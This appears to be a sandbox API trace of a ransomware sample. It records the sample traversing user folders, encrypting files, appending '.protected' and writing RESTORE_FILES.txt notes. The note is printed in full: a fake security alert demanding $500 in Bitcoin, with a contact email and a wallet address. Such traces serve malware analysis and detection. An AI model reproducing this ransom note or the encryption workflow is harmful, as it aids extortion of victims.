(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.634] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.634] CloseHandle (hObject=0x14c) returned 1 [0084.635] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.635] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.635] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt") returned 81 [0084.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.636] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.636] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.637] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.637] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.637] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.637] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.637] CloseHandle (hObject=0xd8) returned 1 [0084.637] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Windows") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files (x86)") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="$Recycle.bin") returned 1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="System Volume Information") returned -1 [0084.637] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache") returned 69 [0084.637] lstrcmpW (lpString1="Feeds Cache", lpString2=".") returned 1 [0084.637] lstrcmpW (lpString1="Feeds Cache", lpString2="..") returned 1 [0084.637] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned 71 [0084.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.639] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.639] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.639] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\.") returned 71 [0084.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.639] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.639] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.639] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.639] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.639] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.639] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\..") returned 72 [0084.639] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.639] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.639] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.640] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Windows") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files (x86)") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="$Recycle.bin") returned 1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="System Volume Information") returned -1 [0084.640] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 78 [0084.640] lstrcmpW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0084.640] lstrcmpW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0084.640] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 80 [0084.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.640] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.640] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.640] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.") returned 80 [0084.640] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.640] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.640] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.640] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.641] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.641] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\..") returned 81 [0084.641] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.641] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.641] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.641] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.641] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.641] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.641] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.641] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.642] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.642] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.643] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.643] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.643] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.643] CloseHandle (hObject=0x150) returned 1 [0084.643] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected") returned 100 [0084.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.protected")) returned 1 [0084.644] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.644] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.644] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.644] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.644] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.644] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.645] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.645] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.646] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.646] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.646] CloseHandle (hObject=0x150) returned 1 [0084.647] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected") returned 98 [0084.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].protected")) returned 1 [0084.648] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.648] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.648] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt") returned 96 [0084.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.651] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption 